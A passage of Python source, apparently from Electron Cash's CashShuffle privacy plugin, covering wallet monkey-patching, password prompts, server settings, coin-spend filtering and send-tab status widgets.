wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(window.utxo_list, "in_progress")
delattr(window.utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful refrence to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
self.on_network_dialog(Plugin.network_dialog) # If we have a network dialgog, add self to network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@hook
def on_new_window(self, window):
if not window.is_wallet_cashshuffle_compatible():
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# Handle possibility that now that plugin is closed or opened, shuffle tx's are hidden or not hidden. hide/unhide them
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window:
# window will raise itself.
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
